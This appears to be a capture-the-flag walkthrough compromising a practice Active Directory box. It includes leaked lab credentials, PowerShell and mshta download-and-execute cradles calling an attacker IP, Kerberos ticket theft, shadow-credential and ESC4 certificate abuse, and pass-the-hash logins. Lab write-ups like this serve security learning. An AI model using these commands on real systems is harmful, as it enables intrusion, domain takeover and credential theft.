rose / KxEPkKe6R8su
rose
KxEPkKe6R8su
Enumeration
sudo nmap -sC -sV -oA 10.129.103.102 -vv 10.129.103.102 -Pn
- From the port 88 open we could assume that it’s a domain controller.
- Port
389,445,1433shows that we haveLDAP,SMB,MSSQLservices running.
PORT 445
- Let’s start our enumeration with port 445. I usually always keep in mind that, I need to compromise as many users as possible rather that looking as many vulnerabilities I could find. This helps me to understand the network properly and find different exploitation path.
- Let’s start our enumeration
nxc smb 10.129.103.102 -u '' -p '' --shares
- No anonymous share access
nxc smb 10.129.103.102 -u 'rose' -p 'KxEPkKe6R8su' --shares
smbclient.py 'rose:KxEPkKe6R8su@10.129.103.102'
-
We found two interesting files
-
not able to open them but when we convernt in to zip we see few insteresing in in an xml file
-
We had to convert the file to zip format and extract
SharedStrings.xmlfile out of it to get the list of username and passwords.
| Username | Password | Valid |
|---|---|---|
| angela | 0fwz7Q4mSpurIt99 | |
| oscar | 86LxLBMgEWaKUnBG | true |
| kevin | Md9Wlq1E5bZnVDVo | |
| sa | MSSQLP@ssw0rd! | true |
| rose | KxEPkKe6R8su | ture |
| michael | ||
| ryan | WqSZAF6CysDQbGb3 | |
| sql_svc | WqSZAF6CysDQbGb3 | |
| ca_svc | ||
- Let’s do Bloodhound collection.
Port 389
nxc ldap 10.129.103.102 -u oscar -p '86LxLBMgEWaKUnBG' --bloodhound -c All -d sequel.htb --dns-server 10.129.103.102
- We don’t find a way in bloodhound at the moment that we can exploit.
Port 1443
mssqlclient.py 'sa:MSSQLP@ssw0rd!@10.129.103.102' 
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadString(''http://10.10.14.126/sharp.ps1'') | IEX"'
Resource Development
./automation.sh
cme smb TargetIP -u 'Administrator' -H Hash or Password --local-auth -x "C:\Windows\System32\mshta.exe http://10.10.14.126/sharp.hta"
Command to run mshta directly:
mshta.exe http://10.10.14.126/sharp.hta
PowerShell command with URL encoding:
powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.14.126/sharp.ps1%27)%22
PowerShell command (without URL encoding):
(New-Object System.Net.WebClient).DownloadString('http://10.10.14.126/sharp.ps1') | IEX
Another PowerShell command for execution:
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.126/sharp.ps1')"
Initial access
rubeus tgtdeleg /nowrap
./rubeustoccache.py "doIFhDCCBYCgAwIBBaEDAgEWooIEkDCCBIxhggSIMIIEhKADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbClNFUVVFTC5IVEKjggRMMIIESKADAgESoQMCAQKiggQ6BIIENpyo2dnr8JvnTpn0q/vqr6azcAvhGtS0OMHOBR+4dy5V2r0AWpCkTSM+hpbhl8OQIg13t5S1ndQmxO/q8QvG+5dM1Al//q6luAZ5SNg7UZRXzPoSEXzAtjHmWr3RXYyvBepbbhUV9r01EmiT10opEOsUlMuhkCJTL8L+lPuY1ttQW3QYFe8Y2Q5lTzifmqbs18IibWdrpcCc65/TUcHgLkEylfcZrirYPfNdBQbS5VeoMgvKzZKo4Bd2H/rPeJxkEQ1hFJ3wcvDoc9aX2IBnC7peVsUySy9BcAE0itDp6CrIBRhrIz31bS2Dr6RkkMuxA7Sti6x4HjsWb1Z5vSKjZBmZm+vw+UaXEHF+Z8HgdFcyjzVhWmj10vj+jgwLvmr2fviEG2RhSuI1KBUR09JQO7Vi9u9e2iCe4daPIIDW0t+PZo/0EtcrbuSzqT9cKeRs4h/FOqcqnVe8ls50sxnLZQYEgZEh2CAik6+YK9LTUawzxAYjjQYR8Xih4022BsiM3cG+HjJc9w7E14YGpw+NSVCG8LMhifmQL4JqZccYjq0OJoYdL6kLoi3fEGkEFZ+h76ABBdsHHHoer8GQOgvTmi8oP2mSamuwoeW+zLR0mbTURlvzcBf81WhyKidtHX7dEdaO3c/TBtvGLFJa/Eb6S/s/JdkG5sBzZJGlNrdwe+I4g/GjmQz/7TMCIo0rNYxF9Wy3RjPuI0t4BbZcvbr8V3lShVbDLwQ5b2J2xYXZj9gZMjB8Z+0X4VgP4IIjxp158LvJOwfVGgsCBET6HX+SHvg2dZHvOvDqOXKe/KX2L5Y/wAGjVtkB9EWFxdJkhOIyfVVyAqLU468VukWcpuMfrcpoManCdvDuLDhENDipTKSSF++ksGs0cIbyvXkf1WB1MwJ80vuEJ1wW27gGyDtGAsaRMIVq9TUsRxtQUmxBGr62QBtRDIrSef2Yhv6nEEmXqqMhq+Q+iHCQdoKAPGh3r4Y94BQ5jL32v5pCVK5E4MmOPCKn2bPT5V5/yGsrd2J/Gc8AZJF/vv5rrOG0kmcQZMrS9r8m846rVYbbBG6NxO0CBWFbJR+gBKAUAENU3ul/NZNCwuhe4JIW1ew/RebK1NAcZw5vl7s9opnPE1YX/z/ooNlnsHAXu/h+lynJFWOt5SgRoKWbdUEWG4fWmFj7vHWaTl5jDC3hUoKdD1xiOq35UBVsPYFnEOI1m+4Ct2Z4l7RZE7LFq32ItxNCaBe/QI6f0vBjqkPm8OoNTu0Klovqo54v7woeqSvtFPyZLL3Qg9561RfvTB0DnURe5gLjeXuVSJ2ldo1tdhrBNwMW2K0Z/lRoTtMxYkNtLe+yzFCYruawyjs0DFotjcjLgfnL5rUIY4ueddM7RsBZVQ9RzP0w5RAMHKCUtlA3qOTdtod05uPN2k1Z34bU9QrikZOQiD2mQeTtFxOjgd8wgdygAwIBAKKB1ASB0X2BzjCBy6CByDCBxTCBwqArMCmgAwIBEqEiBCCbKDuDbocbWP43zGhnxSutb2IUAeiMs657RDioBPbyYKEMGwpTRVFVRUwuSFRCohQwEqADAgEBoQswCRsHc3FsX3N2Y6MHAwUAYKEAAKURGA8yMDI1MDExMTIzNDEzNFqmERgPMjAyNTAxMTIwNjI3MjdapxEYDzIwMjUwMTE4MjAyNzI3WqgMGwpTRVFVRUwuSFRCqR8wHaADAgECoRYwFBsGa3JidGd0GwpTRVFVRUwuSFRC" ccache test
export KRB5CCNANE=test
klist
- Login as user ryan
evil-winrm -i 10.129.103.102 -u ryan -p 'WqSZAF6CysDQbGb3'
(New-Object System.Net.WebClient).DownloadString('http://10.10.14.126/sharp.ps1') | IEX
- ryan has writeowner on ca_svc so we could grant ourself Objectowner
./bloodyAD.py --host DC01 -u 'ryan' -d 'sequel.htb' -p 'WqSZAF6CysDQbGb3' set owner ca_svc ryan
./bloodyAD.py --host DC01 -u 'ryan' -d 'sequel.htb' -p 'WqSZAF6CysDQbGb3' add genericAll ca_svc ryan
./bloodyAD.py --host DC01 -u 'ryan' -d 'sequel.htb' -p 'WqSZAF6CysDQbGb3' set password ca_svc 'Password123!'
- Shadow Credentials
./pywhisker.py -d "sequel.htb" -u "ryan" -p 'WqSZAF6CysDQbGb3' --target "ca_svc" --action "add" -e pfx
certipy cert -pfx ~/htb_season7/escape2/qSzNZADL.pfx -password OVh7jG3CAgsxeFqsEKPD -export -out ca_svc
certipy auth -pfx ca_svc -dc-ip 10.129.103.102 -username ca_svc -domain sequel.htb
Got hash for 'ca_svc@sequel.htb': aad3b435b51404eeaad3b435b51404ee:3b181b914e7a9d5508ea1e20bc2b7fce
| Username | Password | Valid |
|---|---|---|
| angela | 0fwz7Q4mSpurIt99 | |
| oscar | 86LxLBMgEWaKUnBG | true |
| kevin | Md9Wlq1E5bZnVDVo | |
| sa | MSSQLP@ssw0rd! | true |
| rose | KxEPkKe6R8su | ture |
| michael | ||
| ryan | WqSZAF6CysDQbGb3 | |
| sql_svc | WqSZAF6CysDQbGb3 | |
| ca_svc | 3b181b914e7a9d5508ea1e20bc2b7fce | |
| administrator | 7a8d4e04986afa8ed4060f75e5a0b3ff |
- ESC4
certipy find -vulnerable -username 'ca_svc@sequel.htb' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -dc-ip 10.129.103.102 -k -target DC01.sequel.htb -debug
certipy template -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -template DunderMifflinAuthentication -save-old -dc-ip 10.129.103.102
certipy req -username 'ca_svc@sequel.htb' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca 'sequel-DC01-CA' -dc-ip 10.129.103.102 -template DunderMifflinAuthentication -upn 'administrator@sequel.htb' -target DC01.sequel.htb -dns 'dc01.sequel.htb'
certipy auth -pfx administrator_dc01.pfx -dc-ip 10.129.103.102
evil-winrm -i 10.129.103.102 -u administrato
r -H 7a8d4e04986afa8ed4060f75e5a0b3ff
